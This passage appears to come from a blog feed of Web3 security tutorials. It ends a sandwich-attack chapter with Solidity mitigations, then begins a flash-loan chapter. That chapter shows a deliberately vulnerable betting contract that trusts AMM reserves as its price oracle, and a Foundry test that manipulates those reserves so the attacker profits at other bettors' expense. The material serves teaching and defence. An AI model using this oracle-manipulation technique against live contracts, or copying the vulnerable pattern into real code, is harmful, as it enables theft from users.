$$\text{Price Increase from Front-Run} = \text{Amount Bought by Attacker} \times 0.01 \, \text{ETH} $$

$$\text{Price Increase from Front-Run} = 15 \times 0.01 = 0.15 \, \text{ETH} $$

After the victim’s transaction is mined, the price rises further. Finally, the bot performs a **back-run**, selling its **15 potions** at the new inflated price.

![](/content/images/2024/12/image-17.png)

Bot Output with Sandwich Attack Results

The results of the attack are summarized by the bot. Without the attack, the attacker’s profit would have been zero. However, by leveraging the Sandwich Attack strategy, the bot calculates a total profit of **3.7499 ETH**.

This profit is derived from the manipulation of the potion price through the front-running and back-running transactions. At a high level:

1.  **Front-Run Cost**: The bot buys **15 potions** at the initial price of **1 ETH** each, totaling **15 ETH**.
2.  **Back-Run Revenue**: The bot sells these potions at the final inflated price after the victim’s transaction. With each potion increasing in price due to the victim and the attacker’s transactions, the bot sells at a significantly higher value, resulting in the profit.

The calculated profit of **3.7499 ETH** reflects the effectiveness of the Sandwich Attack strategy in exploiting pricing dynamics.
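The headline figure can be reproduced directly from the contract’s pricing rule (each potion bought raises the price by 0.01 ETH, and sells execute at the current price); the small gap to 3.7499 ETH is gas. A sketch in integer wei:

```python
ETH = 10**18
price = 1 * ETH                   # initial potion price: 1 ETH
front_run = 15
cost = front_run * price          # attacker spends 15 ETH
price += front_run * ETH // 100   # price rises to 1.15 ETH
victim_buy = 10
price += victim_buy * ETH // 100  # price rises to 1.25 ETH
revenue = front_run * price       # attacker sells 15 at 1.25 ETH = 18.75 ETH
profit_eth = (revenue - cost) / ETH
print(profit_eth)                 # 3.75, before gas costs
```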

# Top Three Recommendations to Mitigate Sandwich Attacks

To address the vulnerabilities that enable Sandwich Attacks, we can apply some practical improvements to the **MagicPotionMarket** contract. These solutions aim to balance security and usability while making the contract much harder to exploit. Let’s walk through each approach and its implementation.

## **Slippage Protection**

A common way to prevent sandwich attacks is to give users control over the maximum price they are willing to pay for potions. If an attacker inflates the price before the transaction is mined, it simply reverts.

Here’s how we can do it:

```solidity
function buyPotions(uint256 amount, uint256 maxPrice) external payable {
    require(potionPrice &lt;= maxPrice, &quot;Potion price exceeds slippage tolerance&quot;);
    require(msg.value == amount * potionPrice, &quot;Incorrect ETH value sent&quot;);

    potionBalances[msg.sender] += amount;

    // Increment potion price based on demand
    potionPrice += (amount * 1 ether) / 100;
    require(potionPrice &gt; 0, &quot;Potion price overflow&quot;);

    emit PotionsBought(msg.sender, amount, potionPrice);
}

```

**How does it work?**  
We added a `maxPrice` parameter. This acts as a safeguard for buyers, making sure their transaction only goes through if the potion price hasn’t increased beyond what they’re willing to pay. So, if an attacker tries to front-run, the transaction fails automatically if the price jumps too high.

&lt;details&gt;
&lt;summary&gt;Imagine submitting this transaction:&lt;/summary&gt;

```solidity
buyPotions(10, 1.1 ether); // Only processes if potionPrice ≤ 1.1 ETH

```
&lt;/details&gt;


If the price suddenly spikes above `1.1 ether`, the transaction reverts. Simple, but effective!
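As a plain-Python model (not the contract itself), the guard behaves like this, with a raised exception standing in for a revert:

```python
ETHER = 10**18

def buy_potions(potion_price, amount, max_price):
    """Model of the buyPotions slippage check; raising = reverting."""
    if potion_price > max_price:
        raise ValueError("Potion price exceeds slippage tolerance")
    return amount * potion_price  # wei the buyer must send

# At 1.0 ETH per potion, a 1.1 ETH tolerance lets the purchase through:
cost = buy_potions(1 * ETHER, 10, max_price=11 * ETHER // 10)

# After a front-run pushes the price to 1.15 ETH, the same call reverts:
reverted = False
try:
    buy_potions(115 * ETHER // 100, 10, max_price=11 * ETHER // 10)
except ValueError:
    reverted = True
```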

## **Private Transactions**

Another powerful defense is to make transactions invisible to attackers by using private relayers, such as Flashbots. These tools bypass the public mempool entirely, so malicious actors can’t even see the transaction.

Here’s how we can integrate this concept:

```solidity
mapping(address =&gt; bool) privateRelayer;

modifier onlyPrivateRelayer() {
    require(privateRelayer[msg.sender], &quot;Must send via private relayer&quot;);
    _;
}

function buyPotionsPrivate(uint256 amount) external payable onlyPrivateRelayer {
    require(msg.value == amount * potionPrice, &quot;Incorrect ETH value sent&quot;);

    potionBalances[msg.sender] += amount;

    // Adjust potion price
    potionPrice += (amount * 1 ether) / 100;
    require(potionPrice &gt; 0, &quot;Potion price overflow&quot;);

    emit PotionsBought(msg.sender, amount, potionPrice);
}

function addPrivateRelayer(address relayer) external onlyOwner {
    privateRelayer[relayer] = true;
}

```

**How does it work?**  
Transactions can only come from addresses you’ve added to a whitelist (like trusted private relayers). Attackers can’t front-run what they can’t see. This is particularly effective if buyers are willing to use tools like Flashbots to interact with the contract.

&lt;details&gt;
&lt;summary&gt;Example:&lt;/summary&gt;

```solidity
addPrivateRelayer(flashbotsAddress);

```
&lt;/details&gt;


## **Dynamic Pricing**

Finally, adding unpredictability to potion price updates can throw attackers off. If the price adjustment isn’t deterministic, they can’t predict what will happen during their front-run.

Here’s an example:

```solidity
function buyPotions(uint256 amount) external payable {
    require(msg.value == amount * potionPrice, &quot;Incorrect ETH value sent&quot;);

    potionBalances[msg.sender] += amount;

    // Dynamic pricing: Add randomness to price adjustment
    uint256 priceImpact = (amount * 1 ether) / 100;
    potionPrice += priceImpact + uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 0.01 ether;
    require(potionPrice &gt; 0, &quot;Potion price overflow&quot;);

    emit PotionsBought(msg.sender, amount, potionPrice);
}

```

**How does it work?**  
This method adds a pseudo-random element using `keccak256` over the block timestamp and buyer address, so an attacker can no longer compute the exact potion price their front-run will produce. Keep in mind, though, that `block.timestamp` is visible to (and slightly influenceable by) block producers, so this raises the cost of planning a profitable sandwich rather than providing true randomness.
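A rough Python model of the perturbation's key property follows, using SHA3-256 as a stand-in for Solidity's `keccak256` (the real opcode and `abi.encodePacked` layout differ, so exact values won't match; the `% 0.01 ether` bound does). The address used is hypothetical.

```python
import hashlib

ETHER = 10**18

def price_perturbation(timestamp: int, sender: str) -> int:
    # SHA3-256 stand-in for keccak256(abi.encodePacked(timestamp, sender))
    digest = hashlib.sha3_256(f"{timestamp}{sender}".encode()).digest()
    # The modulo caps the random term strictly below 0.01 ether
    return int.from_bytes(digest, "big") % (ETHER // 100)

p = price_perturbation(1_700_000_000,
                       "0x00000000000000000000000000000000000000a1")
assert 0 <= p < ETHER // 100  # bounded, but weak: inputs are on-chain data
```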

# Conclusion

This chapter provided a deep dive into the intricacies of the Sandwich Attack, not just in theory but through a hands-on implementation. Along the way, we uncovered critical lessons that extend beyond the specific attack and offer broader insights into blockchain security and decentralized ecosystems:

1.  **Understanding the Attack Workflow**: By recreating the Sandwich Attack step-by-step, we gained a clear picture of how front-running and back-running work in tandem to exploit transaction ordering. This attack highlights how attackers can leverage transparency in the mempool to manipulate prices and extract profits—3.7499 ETH in our case.
2.  **Tools and Automation**: The chapter demonstrated the power of using specialized tools such as Anvil for network simulation, Cast for transaction management, and a Python bot to automate the attack process. These tools not only simplified our implementation but also revealed how accessible such attacks can be with the right setup.
3.  **Analyzing Attack Impact**: The exercise highlighted the financial impact of the Sandwich Attack, both on the attacker’s profitability and the victim’s transaction costs. This reinforces the importance of understanding these dynamics when designing smart contracts or decentralized marketplaces.
4.  **Building Security Awareness**: The most significant takeaway is the need for awareness. Understanding the mechanics of such attacks allows developers, users, and auditors to anticipate vulnerabilities and implement measures to reduce exposure, such as slippage protection, private transactions, or alternative sequencing strategies.

# References

-   **Foundry** - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   **Solidity** - Language for Smart Contract Development. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
-   **OpenZeppelin** - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   **Ethereum** - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   **Testing Ethereum Smart Contracts** - Best Practices with Foundry. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/tutorials/testing](https://book.getfoundry.sh/tutorials/testing)
-   **Mempool Mechanics** - Transaction Ordering and Vulnerabilities in Ethereum. &quot;Ethereum Documentation.&quot; Available at: [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
-   **Decentralized Exchanges and Price Manipulation** - Understanding AMMs and Slippage Risks. &quot;Uniswap Documentation.&quot; Available at: [https://docs.uniswap.org/](https://docs.uniswap.org/)
-   **Gas Price Mechanics** - Optimizing Transaction Priority and Fees in Ethereum. &quot;Ethereum Documentation.&quot; Available at: [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
-   **Sandwich Attacks in DeFi** - Identifying and Mitigating Front-Running Risks. &quot;CertiK Blog.&quot; Available at: [https://www.certik.com/](https://www.certik.com/)
-   **Slippage Protection and Private Transactions** - Defending Against Sandwich Attacks in DeFi. &quot;Flashbots Documentation.&quot; Available at: [https://docs.flashbots.net/](https://docs.flashbots.net/)</content:encoded><author>Ruben Santos</author></item><item><title>Breaking the Bet: Simulating Flash Loan Attacks in Decentralized Systems</title><link>https://www.kayssel.com/post/web3-6</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-6</guid><description>Explore how flash loan vulnerabilities impact decentralized systems through the DragonBet contract. Learn about AMMs, token pricing, and manipulation strategies. Dive into a simulated attack and discover key techniques to secure smart contracts against exploitation.</description><pubDate>Sat, 14 Dec 2024 14:33:00 GMT</pubDate><content:encoded># Introduction: Exploring Flash Loan Exploits in DeFi

In this chapter, we dive into the mechanics of flash loan vulnerabilities and how they can be exploited in decentralized systems. Using the **DragonBet** smart contract as a case study, we’ll explore how price manipulation through an Automated Market Maker (AMM) can lead to significant imbalances and unfair profits.

Prepare yourself, as this chapter leans heavily into the mathematics behind reward calculations and price manipulation. Don’t worry, though—everything will be broken down step by step to ensure clarity. Let’s unravel the exploit and see how it operates in practice!

# What is a Flash Loan Vulnerability in Web3?

In the world of Web3 and decentralized finance (DeFi), a **flash loan** is a type of uncollateralized loan that allows users to borrow assets almost instantly, as long as the loan is repaid within the same transaction. While this concept has enabled innovative financial mechanisms, it has also opened the door to a unique class of vulnerabilities.

Flash loans are powerful because they provide immense liquidity without requiring upfront collateral. However, their very nature—being instantaneous and uncollateralized—can be exploited by malicious actors. When combined with other vulnerabilities, flash loans allow attackers to manipulate smart contract logic, pricing mechanisms, or liquidity pools, resulting in significant losses for protocols and users.

#### How Does the Flash Loan Vulnerability Work?

At its core, a **flash loan vulnerability** arises when a smart contract relies on external data or processes that can be manipulated within the same transaction. Here&apos;s how an attack might unfold:

1.  **Obtain a Flash Loan**: The attacker borrows a large sum of tokens without collateral using a flash loan.
2.  **Manipulate External Dependencies**: Within the same transaction, the attacker manipulates an external data source (like a price oracle or liquidity pool). For example, they might artificially inflate or deflate the price of an asset by altering the reserves in a decentralized exchange.
3.  **Exploit the Manipulation**: Using the manipulated data, the attacker interacts with the victim smart contract. The contract, trusting the manipulated input, executes unfavorable trades, grants excessive rewards, or behaves incorrectly.
4.  **Repay the Flash Loan**: After exploiting the vulnerability, the attacker repays the loan and keeps the profit—all in one atomic transaction.

```mermaid
sequenceDiagram
    participant Attacker
    participant FlashLoanProvider as Flash Loan Provider
    participant AMM as AMM/Oracle
    participant VictimContract as Victim Smart Contract

    Attacker -&gt;&gt; FlashLoanProvider: Request flash loan
    FlashLoanProvider --&gt;&gt; Attacker: Provides flash loan
    Attacker -&gt;&gt; AMM: Manipulate price via reserves
    AMM --&gt;&gt; VictimContract: Report manipulated price
    Attacker -&gt;&gt; VictimContract: Exploit vulnerability (e.g., withdraw rewards)
    VictimContract --&gt;&gt; Attacker: Transfer inflated rewards
    Attacker -&gt;&gt; FlashLoanProvider: Repay flash loan
    Attacker --&gt;&gt; Attacker: Keep net profit

```

To truly grasp how flash loan vulnerabilities work, we’ll delve into a practical example of a vulnerable contract and a test case that illustrates the concept.

# Understanding AMMs, Tokens, and Oracles in Web3

Before diving into the details of the vulnerable `DragonBet` contract, let’s first unpack the three key concepts that form its foundation: **tokens**, **Automated Market Makers (AMMs)**, and **oracles**. These elements might sound technical, but with the help of clear and relatable analogies, they become much easier to understand.

### **Tokens: The Currency of Betting**

In the blockchain world, tokens are like digital chips that represent value or ownership. They’re the currency of decentralized systems, much like poker chips in a casino. In the `DragonBet` contract, two types of tokens are used, each serving a distinct purpose:

-   **TokenA:** Imagine this as the money you exchange at the casino’s cashier. It’s the system’s primary currency, often used in the background.
-   **TokenB:** Think of this as the actual poker chips you use at the table. You place bets using these chips in hopes of winning more.

These tokens don’t have fixed values like traditional poker chips. Instead, their exchange rate can change dynamically in response to supply and demand, which is where Automated Market Makers (AMMs) come into play.

### **Automated Market Makers (AMMs): The Decentralized Marketplace**

An Automated Market Maker (AMM), such as **Uniswap**, is like the casino’s cashier where you exchange money (TokenA) for chips (TokenB), but with a twist: the exchange rate isn’t fixed. Instead, it changes dynamically based on how much money and how many chips the cashier has left.

Imagine you walk up to the booth and find:

-   A stack of **1 dollar bills** (representing TokenA).
-   A pile of **poker chips** (representing TokenB).

If you take chips from the pile or add money to the stack, the exchange rate adjusts automatically to reflect the new balance. The fewer chips left in the pile, the more expensive they become, and vice versa. This behavior is governed by a simple rule: $x \cdot y = k$

Where:

-   $x$ is the number of 1 dollar bills (TokenA).
-   $y$ is the number of poker chips (TokenB).
-   $k$ is a constant that keeps the system balanced.

For example, if you trade in money for chips, the pile of money grows ($x$ increases) and the pile of chips shrinks ($y$ decreases). To maintain balance, the cost of each remaining chip rises.
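In code, the cashier's rule looks like this (a sketch with hypothetical pool sizes):

```python
x, y = 1000, 1000        # bills (TokenA) and chips (TokenB) at the booth
k = x * y                # the invariant: x * y must stay constant

bills_in = 100           # you hand over 100 bills...
new_x = x + bills_in
new_y = k // new_x       # ...so the chip pile must shrink to keep k
chips_out = y - new_y    # 1000 - 909 = 91 chips received

price_before = x / y     # 1.00 bill per chip
price_after = new_x / new_y  # ~1.21 bills per chip: chips got pricier
```

Notice the trade itself moved the price; that sensitivity to reserve changes is exactly what an attacker with a large temporary balance can abuse.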

In the `DragonBet` contract, the AMM acts like this cashier, determining the &quot;price&quot; of chips (TokenB) based on the piles&apos; sizes. But here’s the twist: the AMM also serves as the oracle, which introduces potential risks.

### **Oracles: The Information Attendant**

Oracles act as a bridge between blockchain systems and external information. In this analogy, the oracle is like a casino attendant who tells you how much a prize costs in chips. If the attendant gives you incorrect or manipulated information, you might overpay or underpay for a prize.

In the `DragonBet` contract, the AMM acts as both the cashier and the oracle. It determines how much `TokenB` (chips) you need to claim a reward, based on its reserves. This dependency means that if someone manipulates the AMM, they can also manipulate the oracle’s price, creating a potential vulnerability.

By understanding these three concepts—tokens, AMMs, and oracles—you can see how they interact in the `DragonBet` contract. Tokens facilitate the bets, the AMM sets the prices, and the oracle blindly trusts the AMM’s data.

# Vulnerable Smart Contract: DragonBet

To understand how flash loan vulnerabilities intersect with concepts like AMMs, tokens, and oracles, we will analyze the DragonBet smart contract. This contract enables users to place bets on dragons, determining rewards based on the total bets and the exchange rates fetched from an external oracle. By relying on price data sourced from an AMM (explained in the previous section), the contract illustrates how manipulation of these inputs can expose critical vulnerabilities, making it an ideal case study.

&lt;details&gt;
&lt;summary&gt;Vulnerable Smart Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;@openzeppelin/contracts/token/ERC20/IERC20.sol&quot;;

interface IUniswapV2Pair {
    function getReserves()
        external
        view
        returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
}

contract DragonBet {
    IERC20 public tokenA; // Reference token whose price is read from the AMM
    IERC20 public tokenB; // Token used for placing bets
    IUniswapV2Pair public priceOracle; // AMM used as the price oracle

    struct Bet {
        address user;
        uint256 amount;
        uint256 dragonId; // ID of the dragon being bet on
    }

    mapping(uint256 =&gt; Bet[]) public bets; // Bets for each dragon
    uint256 public totalBets; // Total TokenB wagered across all bets

    constructor(address _tokenA, address _tokenB, address _priceOracle) {
        tokenA = IERC20(_tokenA);
        tokenB = IERC20(_tokenB);
        priceOracle = IUniswapV2Pair(_priceOracle);
    }

    /// Allow users to place bets on a dragon
    function placeBet(uint256 dragonId, uint256 amount) external {
        require(amount &gt; 0, &quot;Bet must be greater than zero&quot;);
        require(
            tokenB.transferFrom(msg.sender, address(this), amount),
            &quot;Transfer failed&quot;
        );

        bets[dragonId].push(
            Bet({user: msg.sender, amount: amount, dragonId: dragonId})
        );

        totalBets += amount;
    }

    function resolveBet(uint256 winningDragonId) external {
        uint256 winningPrice = getPrice(); // Fetch the manipulated price
        Bet[] memory winningBets = bets[winningDragonId];
        uint256 totalWinningBets = 0;

        // Calculate the total bets for the winning dragon
        for (uint256 i = 0; i &lt; winningBets.length; i++) {
            totalWinningBets += winningBets[i].amount;
        }

        require(totalWinningBets &gt; 0, &quot;No bets placed on the winning dragon&quot;);

        // Calculate and distribute rewards
        for (uint256 i = 0; i &lt; winningBets.length; i++) {
            uint256 reward = (winningBets[i].amount *
                totalBets *
                winningPrice) /
                totalWinningBets /
                1e18;

            // Limit rewards to the contract balance
            uint256 contractBalance = tokenB.balanceOf(address(this));
            if (reward &gt; contractBalance) {
                reward = contractBalance; // Cap the reward at the available balance
            }

            // Perform the token transfer
            require(
                tokenB.transfer(winningBets[i].user, reward),
                &quot;Transfer failed&quot;
            );
        }

        // Reset the total bets and clean up
        totalBets = 0;
        delete bets[winningDragonId];
    }

    function getPrice() public view returns (uint256) {
        (uint112 reserve0, uint112 reserve1, ) = priceOracle.getReserves();
        return (uint256(reserve1) * 1e18) / uint256(reserve0);
    }
}



```
&lt;/details&gt;


### Data Structures and State Variables

The `DragonBet` contract defines its foundational components at the start, which include the tokens for the betting process, a price oracle, and the data structures that manage user bets.

```solidity
IERC20 public tokenA; // Token used in the AMM price calculation
IERC20 public tokenB; // Token used for placing bets
IUniswapV2Pair public priceOracle; // AMM used as a price oracle

struct Bet {
    address user; // Address of the user placing the bet
    uint256 amount; // Amount of TokenB bet
    uint256 dragonId; // ID of the dragon being bet on
}

mapping(uint256 =&gt; Bet[]) public bets; // A list of bets for each dragon
uint256 public totalBets; // Total TokenB bet across all dragons

```

The contract uses two tokens, `tokenA` and `tokenB`, to operate. `TokenA` is a reference token whose price is fetched from an external AMM via the `priceOracle`. This exchange rate is used later in calculations. `TokenB`, on the other hand, is the token that bettors use to place their bets.

The `Bet` struct organizes information about each user&apos;s wager, including the bettor’s address, the amount bet, and the ID of the dragon they are betting on. These bets are stored in a mapping called `bets`, categorized by dragon ID. Additionally, the variable `totalBets` tracks the total amount of TokenB wagered across all dragons.

### Placing Bets

The `placeBet` function allows users to participate in betting by selecting a dragon and specifying the amount they wish to wager.

```solidity
function placeBet(uint256 dragonId, uint256 amount) external {
    require(amount &gt; 0, &quot;Bet must be greater than zero&quot;);
    require(
        tokenB.transferFrom(msg.sender, address(this), amount),
        &quot;Transfer failed&quot;
    );

    bets[dragonId].push(
        Bet({user: msg.sender, amount: amount, dragonId: dragonId})
    );

    totalBets += amount;
}

```

A user calls this function to place a bet on a specific dragon. First, it checks that the bet amount is greater than zero. Then, it transfers the specified amount of `tokenB` from the user’s wallet to the contract using `transferFrom`. If successful, the function creates a new `Bet` struct with the user&apos;s address, bet amount, and dragon ID. This bet is stored in the appropriate array within the `bets` mapping. Finally, the total amount of bets is updated.

### Resolving Bets and Distributing Rewards

The `resolveBet` function is the heart of the contract’s payout system. Its job is to calculate and distribute rewards to players who bet on the winning dragon, relying on the current price of `TokenA` in terms of `TokenB` as provided by the `priceOracle`. This dependency becomes key to how the attacker exploits the system.

```solidity
function resolveBet(uint256 winningDragonId) external {
    uint256 winningPrice = getPrice(); // Fetch the manipulated price
    Bet[] memory winningBets = bets[winningDragonId];
    uint256 totalWinningBets = 0;

    for (uint256 i = 0; i &lt; winningBets.length; i++) {
        totalWinningBets += winningBets[i].amount;
    }

    require(totalWinningBets &gt; 0, &quot;No bets placed on the winning dragon&quot;);

    for (uint256 i = 0; i &lt; winningBets.length; i++) {
        uint256 reward = (winningBets[i].amount *
            totalBets *
            winningPrice) /
            totalWinningBets /
            1e18;

        uint256 contractBalance = tokenB.balanceOf(address(this));
        if (reward &gt; contractBalance) {
            reward = contractBalance;
        }

        require(
            tokenB.transfer(winningBets[i].user, reward),
            &quot;Transfer failed&quot;
        );
    }

    totalBets = 0;
    delete bets[winningDragonId];
}


```

First, the function retrieves the current price of `TokenA`, calculated dynamically based on the AMM reserves. The formula for the price is simple:

$$\text{Price of TokenA (winningPrice)} = \frac{\text{reserveB} \times 10^{18}}{\text{reserveA}}$$

With the price in hand, the function gathers all the bets placed on the winning dragon and sums them up. This total amount, called `totalWinningBets`, reflects how much was wagered on the dragon. If no bets were placed, the function stops execution with an error. However, when valid bets exist, the function proceeds to calculate each bettor’s reward.

Rewards are distributed proportionally based on how much each player bet relative to others. The formula for calculating a reward is:

$$\text{Reward} = \frac{\text{betAmount} \cdot \text{totalBets} \cdot \text{winningPrice}}{\text{totalWinningBets} \cdot 10^{18}}$$

This ensures that bigger bets receive larger rewards.

Before distributing the rewards, the function includes a safeguard: rewards are capped at the contract’s current balance of `TokenB`. This prevents the contract from overpaying and ensures it remains solvent. After calculating the reward, the contract transfers the corresponding amount of `TokenB` to the bettor. If the transfer fails, the function reverts to maintain system integrity.

Finally, after distributing rewards, the contract resets its state for the next betting round. It clears all bets for the winning dragon and sets the total bets pool (`totalBets`) back to zero. This ensures the contract is ready for new wagers without leftover data from previous rounds.
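The same calculation in plain Python (values in wei, mirroring the contract's 1e18 fixed-point scaling and the balance cap):

```python
ETHER = 10**18

def reward(bet_amount, total_bets, winning_price, total_winning_bets,
           contract_balance):
    # Mirrors resolveBet: multiply first, then floor-divide, as in Solidity
    r = bet_amount * total_bets * winning_price // total_winning_bets // ETHER
    return min(r, contract_balance)  # cap at the contract's TokenB balance

# With a fair price of 1.0, a bettor holding all 5 winning TokenB out of a
# 7 TokenB pool collects the whole pool:
r = reward(5 * ETHER, 7 * ETHER, 1 * ETHER, 5 * ETHER, 10_000 * ETHER)
assert r == 7 * ETHER
```

The danger sits in `winning_price`: everything else is internal accounting, but that one input comes straight from the AMM.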

### Fetching the Price from the Oracle

The `getPrice` function retrieves the current price of `tokenA` in terms of `tokenB` from the AMM.

```solidity
function getPrice() public view returns (uint256) {
    (uint112 reserve0, uint112 reserve1, ) = priceOracle.getReserves();
    return (uint256(reserve1) * 1e18) / uint256(reserve0);
}


```

This function calculates the price using the formula:

$$\text{Price} = \frac{\text{Reserve of TokenB} \times 10^{18}}{\text{Reserve of TokenA}}$$
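Equivalently, in plain Python fixed-point arithmetic (a sketch with illustrative reserves):

```python
ETHER = 10**18

def get_price(reserve_a, reserve_b):
    # reserve1 * 1e18 / reserve0, with floor division as in Solidity
    return reserve_b * ETHER // reserve_a

assert get_price(3000 * ETHER, 3000 * ETHER) == 1 * ETHER  # balanced: 1.0
assert get_price(2000 * ETHER, 4000 * ETHER) == 2 * ETHER  # skewed: 2.0
```

Because the result is a pure function of the current reserves, anyone who can move the reserves within a transaction can move the "price".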

# Simulating the Attack: Exploiting the Flash Loan Vulnerability

Now that we’ve explored the vulnerable `DragonBet` contract, let’s dive into how this vulnerability can be exploited through a step-by-step test case. [Using Foundry, as we’ve done in previous chapters](https://www.kayssel.com/post/web3-4/), we’ll simulate a flash loan attack to demonstrate how the contract’s dependency on the AMM can be manipulated to an attacker’s advantage.

&lt;details&gt;
&lt;summary&gt;Code of the attack&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Test.sol&quot;;
import &quot;../src/DragonBet.sol&quot;;
import &quot;@openzeppelin/contracts/token/ERC20/ERC20.sol&quot;;

/// @notice Mock token to simulate tokenA and tokenB
contract MockToken is ERC20 {
    constructor(string memory name, string memory symbol) ERC20(name, symbol) {
        _mint(msg.sender, 1_000_000 ether); // Mint a large initial supply to the deployer
    }

    function mint(address to, uint256 amount) external {
        _mint(to, amount); // Allow minting tokens to any address
    }
}

/// @notice Mock AMM to simulate the price oracle
contract MockAMM {
    uint256 public reserveA;
    uint256 public reserveB;

    function setReserves(uint256 _reserveA, uint256 _reserveB) external {
        reserveA = _reserveA; // Set TokenA reserves
        reserveB = _reserveB; // Set TokenB reserves
    }

    function getReserves() external view returns (uint112, uint112, uint32) {
        // Return the reserves and a mock timestamp
        return (uint112(reserveA), uint112(reserveB), uint32(block.timestamp));
    }
}

contract DragonBetTest is Test {
    DragonBet public dragonBet;
    MockToken public tokenA;
    MockToken public tokenB;
    MockAMM public amm;

    address attacker = address(0x123);
    address bettor1 = address(0x456);
    address bettor2 = address(0x789);

    function setUp() public {
        // Deploy tokens
        tokenA = new MockToken(&quot;TokenA&quot;, &quot;TKA&quot;); // Token used in the AMM
        tokenB = new MockToken(&quot;TokenB&quot;, &quot;TKB&quot;); // Token used for betting

        // Deploy mock AMM
        amm = new MockAMM();

        // Deploy DragonBet contract
        dragonBet = new DragonBet(
            address(tokenA),
            address(tokenB),
            address(amm)
        );

        // Mint and distribute tokens for participants
        tokenB.mint(attacker, 100 ether); // Attacker starts with 100 TokenB
        tokenB.mint(bettor1, 100 ether); // Bettor 1 starts with 100 TokenB
        tokenB.mint(bettor2, 100 ether); // Bettor 2 starts with 100 TokenB

        // Pre-fund the contract with enough TokenB for rewards
        tokenB.mint(address(dragonBet), 10_000 ether); // Contract holds sufficient TokenB

        // Mint TokenA to the AMM for initial reserves
        tokenA.mint(address(amm), 3_000 ether); // Initial TokenA reserves in AMM
        tokenB.mint(address(amm), 3_000 ether); // Initial TokenB reserves in AMM

        // Approve DragonBet contract to spend TokenB for bets
        vm.startPrank(attacker);
        tokenB.approve(address(dragonBet), type(uint256).max); // Attacker approves the contract
        vm.stopPrank();

        vm.startPrank(bettor1);
        tokenB.approve(address(dragonBet), type(uint256).max); // Bettor 1 approves the contract
        vm.stopPrank();

        vm.startPrank(bettor2);
        tokenB.approve(address(dragonBet), type(uint256).max); // Bettor 2 approves the contract
        vm.stopPrank();

        // Set initial AMM reserves for the price oracle
        amm.setReserves(3_000 ether, 3_000 ether); // Initial price: 1 TokenB = 1 TokenA
    }

    function toEth(uint256 value) internal pure returns (string memory) {
        uint256 ethValue = value / 1e18; // Get the integer part of the value
        uint256 fractional = (value % 1e18) / 1e15; // Get the first three decimal places
        return
            string(
                abi.encodePacked(
                    uint2str(ethValue),
                    &quot;.&quot;,
                    uint2str(fractional),
                    &quot; ETH&quot;
                )
            );
    }

    function uint2str(uint256 _i) internal pure returns (string memory) {
        if (_i == 0) {
            return &quot;0&quot;;
        }
        uint256 j = _i;
        uint256 len;
        while (j != 0) {
            len++;
            j /= 10;
        }
        bytes memory bstr = new bytes(len);
        uint256 k = len;
        while (_i != 0) {
            k = k - 1;
            uint8 temp = (48 + uint8(_i - (_i / 10) * 10));
            bytes1 b1 = bytes1(temp);
            bstr[k] = b1;
            _i /= 10;
        }
        return string(bstr);
    }

    function testFlashLoanAttack() public {
        // Step 1: Legitimate initial bets
        vm.startPrank(bettor1);
        dragonBet.placeBet(1, 5 ether); // Bettor 1 bets on dragon 1
        vm.stopPrank();

        vm.startPrank(bettor2);
        dragonBet.placeBet(1, 1 ether); // Bettor 2 bets on dragon 1
        vm.stopPrank();

        // Step 2: Simulate a flash loan
        vm.startPrank(attacker);

        console.log(&quot;=== Before Flash Loan ===&quot;);
        console.log(&quot;Attacker balance: &quot;, toEth(tokenB.balanceOf(attacker)));

        // Simulate a flash loan by minting TokenB to the attacker
        uint256 flashLoanAmount = 1_000 ether; 
        tokenB.mint(attacker, flashLoanAmount);

        console.log(
            &quot;Attacker balance after flash loan: &quot;,
            toEth(tokenB.balanceOf(attacker))
        );

        // Price manipulation: increase TokenB reserves and decrease TokenA reserves
        uint256 addedTokenB = 1_000 ether;
        uint256 removedTokenA = (amm.reserveA() * addedTokenB) / amm.reserveB();

        amm.setReserves(
            amm.reserveA() - removedTokenA,
            amm.reserveB() + addedTokenB
        );

        uint256 manipulatedPrice = dragonBet.getPrice();
        console.log(
            &quot;Manipulated price (winningPrice):&quot;,
            toEth(manipulatedPrice)
        );

        // Step 3: Attacker places a bet using the manipulated price
        dragonBet.placeBet(2, 1 ether);

        console.log(&quot;=== After price manipulation and bet ===&quot;);
        uint256 totalBetsGlobal = dragonBet.totalBets();
        console.log(&quot;Total bets globally (totalBets):&quot;, toEth(totalBetsGlobal));

        // Step 4: Resolve the bets
        dragonBet.resolveBet(2);

        // Step 5: Repay the flash loan
        tokenB.transfer(address(this), flashLoanAmount);
        console.log(
            &quot;Attacker balance after loan repayment: &quot;,
            toEth(tokenB.balanceOf(attacker))
        );

        vm.stopPrank();

        // Step 6: Final balance checks
        uint256 attackerBalanceAfter = tokenB.balanceOf(attacker);
        uint256 bettor1BalanceAfter = tokenB.balanceOf(bettor1);
        uint256 bettor2BalanceAfter = tokenB.balanceOf(bettor2);

        console.log(&quot;=== Final Balances ===&quot;);
        console.log(&quot;Attacker balance after: &quot;, toEth(attackerBalanceAfter));
        console.log(&quot;Bettor 1 balance after: &quot;, toEth(bettor1BalanceAfter));
        console.log(&quot;Bettor 2 balance after: &quot;, toEth(bettor2BalanceAfter));

        // Validate that the attacker profited
        assert(attackerBalanceAfter &gt; 100 ether); // Attacker made a profit
        assert(bettor1BalanceAfter &lt; 100 ether); // Bettor 1 lost
        assert(bettor2BalanceAfter &lt; 100 ether); // Bettor 2 lost
    }
}

```
&lt;/details&gt;


## The Exploitation Strategy

Let’s break down the strategy we’ll implement in our test case.

